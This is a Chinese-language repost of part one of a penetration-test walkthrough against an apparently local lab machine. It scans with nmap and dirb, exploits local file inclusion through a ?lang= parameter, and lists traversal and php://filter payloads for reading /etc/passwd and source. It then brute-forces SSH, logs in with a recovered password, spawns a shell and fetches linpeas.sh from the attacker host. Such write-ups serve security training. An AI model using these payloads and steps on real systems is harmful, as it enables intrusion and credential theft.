首页 网络安全 渗透测试 查看内容

记一次红队渗透实战项目(上)

2023-2-3 21:06 2737 0

摘要: 前言一、信息收集信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用nmap来演示信息收集1、nmap扫描存活IP由于本项目环境是nat模式需要项目IP地址,扫描挖掘本地的IP地址信息:本机IP为:192.168.40.1 ...
关键词: 192.168 枚举 40.190 过滤器 信息 http 端口 扫描 php 发现

前言

一、信息收集

信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用nmap来演示信息收集

1、nmap扫描存活IP

由于本项目环境是nat模式需要项目IP地址,扫描挖掘本地的IP地址信息:

本机IP为:192.168.40.177。

发现本kali ip为40段!用40段进行全网段扫描:

nmap -sP 192.168.40.0/24

Nmap scan report for localhost (192.168.40.190)

发现项目IP地址:192.168.40.190。

2、nmap全端口服务枚举

进行namp端口服务枚举:

nmap -p- 192.168.40.190

得到开放的端口信息:

80/tcp    open  http    111/tcp   open  rpcbind3333/tcp  open  dec-notes ssh OpenSSH 6.7p1    47046/tcp open  unknown

开启了80、111和3333端口,继续探测下端口信息:

nmap 192.168.40.190 -p80,111,3333,35523 -A -T5

可以详细看到端口开启的版本信息,就从web页面信息枚举信息!

3、web信息枚举

访问web页面:

http://192.168.40.190/

没有什么可用信息!扫描下目录枚举下信息。

4、dirb目录扫描

dirb扫描目录:

dirb http://192.168.40.190/

dirb扫出的目录都是访问空白页面!

查看主页的静态源码发现:

?lang= ,出现这种形式,很可能是sql注入或文件包含

访问下该目录:

http://192.168.40.190/?lang=fr

发现跳转回了主页

利用dirb扫描:

dirb http://192.168.40.190/?lang=

发现存在fr和index

http://192.168.40.190/?lang=fr  http://192.168.40.190/?lang=index

尝试访问fr.php和index.php,发现都跳转回主页!

http://192.168.40.190/?lang=fr

通过抓包分析:curl测试是否存在文件包含响应

curl -i http://192.168.40.190/?lang=fr     curl -i http://192.168.40.190/?lang=index-i    ----include 在输出中包含协议响应头

对比发现:

fr :HTTP/1.1 200 OKindex:HTTP/1.0 500 Internal Server Error

疑似存在文件包含,该文件底层可能存在inclu()函数,开始测试!

三、文件包含

通过过滤器方法绕过枚举出需要读的文件信息。

PHP存在四种过滤器:PHP 过滤器用于验证和过滤来自非安全来源的数据,比如用户的输入。
1)字符串过滤器:
字符串过滤器就是用户输入的内容会转换为大写、小写、ROT13字符、或者去除php标记等功能。
2)转换过滤器:
就是用户输入的数据转换为base64编码和解码功能,还有将字符串转换为 8-bit 字符串功能。
3)压缩过滤器:
zip中有zlib和bzip2等函数协议,功能就是在用户传输中会有压缩文件做一些压缩函数转换功能。
4)加密过滤器
mcrypt 是php里面重要的加密支持扩展库,主要是用mcrypt 扩展库中各种加密函数对用户输入内容进行转换功能。

那么不管是哪些过滤器,都可以尝试下面六种方法去操作测试是否可以进行文件包含:

/index.php?page=/etc/passwd/index.php?page=.. /../../../../../etc/passwdindex.php?page=php://filter/read=/index.php?page=php://filter/convert.base64-encode/resource=/index.php?page=zip://page=data://

用过滤器测试下文件包含:

curl http://192.168.40.190/?lang=php://filter/convert.base64-encode/resource=index | head -n 1 | base64 -d

获得密码:

Niamey4Ever227!!!

但是不知道是哪个用户的密码,爆破ssh获得用户名!

四、ssh用户名枚举爆破

1、cewl枚举用户名

cewl http://192.168.40.190/

2、暴力破解ssh

利用实战常用的:gorailgun.exe

记得修改下端口 ,项目ssh端口为3333

成功获得用户:mamadou

五、内部信息枚举

1、ssh登录

ssh [email protected] -p 3333Niamey4Ever227!!!

输入进来发现这是:Python 2.7.9的命令框

通过python获得bash正常shell:

import pty;pty.spawn('/bin/bash');

获得正常shell!

2、脚本信息枚举

开启http服务上传扫描脚本linpeas.sh:

python -m SimpleHTTPServer 8081 wget http://192.168.40.177:8081/linpeas.sh

上传成功!


本文出处: https://www.toutiao.com/article/7194348346100826663/
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部